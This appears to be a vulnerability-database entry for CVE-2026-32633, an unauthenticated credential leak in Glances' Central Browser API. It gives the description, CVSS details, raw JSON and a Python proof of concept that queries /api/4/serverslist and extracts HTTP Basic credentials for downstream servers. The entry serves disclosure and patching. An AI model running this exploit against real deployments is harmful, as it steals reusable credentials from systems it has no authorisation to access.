Security Vulnerability Report
CVE-2026-32633 CVSS 9.1 CRITICAL

CVE-2026-32633

Published: 2026-03-18 18:16:29
Last Modified: 2026-03-19 19:04:46

Description

Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, in Central Browser mode, the `/api/4/serverslist` endpoint returns raw server objects from `GlancesServersList.get_servers_list()`. Those objects are mutated in-place during background polling and can contain a `uri` field with embedded HTTP Basic credentials for downstream Glances servers, using the reusable pbkdf2-derived Glances authentication secret. If the front Glances Browser/API instance is started without `--password`, which is supported and common for internal network deployments, `/api/4/serverslist` is completely unauthenticated. Any network user who can reach the Browser API can retrieve reusable credentials for protected downstream Glances servers once they have been polled by the browser instance. Version 4.5.2 fixes the issue.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:* - VULNERABLE
Glances < 4.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2026-32633 PoC - Unauthenticated credential disclosure
# Target: Glances instance running in Browser mode without --password
target_url = "http://<target_ip>:61208/api/4/serverslist"


def exploit():
    # No authentication required - this is the vulnerability
    response = requests.get(target_url)
    if response.status_code == 200:
        servers = response.json()
        print("[+] Successfully retrieved server list")
        print("[+] Extracted credentials:")
        credentials = []
        for server in servers:
            if 'uri' in server:
                uri = server['uri']
                print(f"[*] URI: {uri}")
                # Extract credentials from URI
                if '@' in uri:
                    auth_part = uri.split('@')[0].split('://')[1]
                    credentials.append(auth_part)
        return credentials
    else:
        print(f"[-] Request failed with status: {response.status_code}")
        return []


if __name__ == "__main__":
    creds = exploit()
    print(f"\n[+] Found {len(creds)} credential pairs")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32633", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:28.933", "lastModified": "2026-03-19T19:04:46.033", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, in Central Browser mode, the `/api/4/serverslist` endpoint returns raw server objects from `GlancesServersList.get_servers_list()`. Those objects are mutated in-place during background polling and can contain a `uri` field with embedded HTTP Basic credentials for downstream Glances servers, using the reusable pbkdf2-derived Glances authentication secret. If the front Glances Browser/API instance is started without `--password`, which is supported and common for internal network deployments, `/api/4/serverslist` is completely unauthenticated. Any network user who can reach the Browser API can retrieve reusable credentials for protected downstream Glances servers once they have been polled by the browser instance. Version 4.5.2 fixes the issue."}, {"lang": "es", "value": "Glances es una herramienta de monitoreo de sistema de código abierto multiplataforma. Antes de la versión 4.5.2, en modo Navegador Central, el endpoint `/api/4/serverslist` devuelve objetos de servidor sin procesar de `GlancesServersList.get_servers_list()`. Esos objetos son mutados in situ durante el sondeo en segundo plano y pueden contener un campo `uri` con credenciales HTTP Basic incrustadas para servidores Glances descendentes, utilizando el secreto de autenticación de Glances derivado de pbkdf2 reutilizable. Si la instancia frontal de Navegador/API de Glances se inicia sin `--password`, lo cual es compatible y común para implementaciones de red internas, `/api/4/serverslist` no está completamente autenticado. Cualquier usuario de red que pueda alcanzar la API del Navegador puede recuperar credenciales reutilizables para servidores Glances descendentes protegidos una vez que hayan sido sondeados por la instancia del navegador. La versión 4.5.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-522"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.2", "matchCriteriaId": "3FC19E01-80F1-43BB-912C-39FE99143A59"}]}]}], "references": [{"url": "https://github.com/nicolargo/glances/commit/879ef8688ffa1630839549751d3c7ef9961d361e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}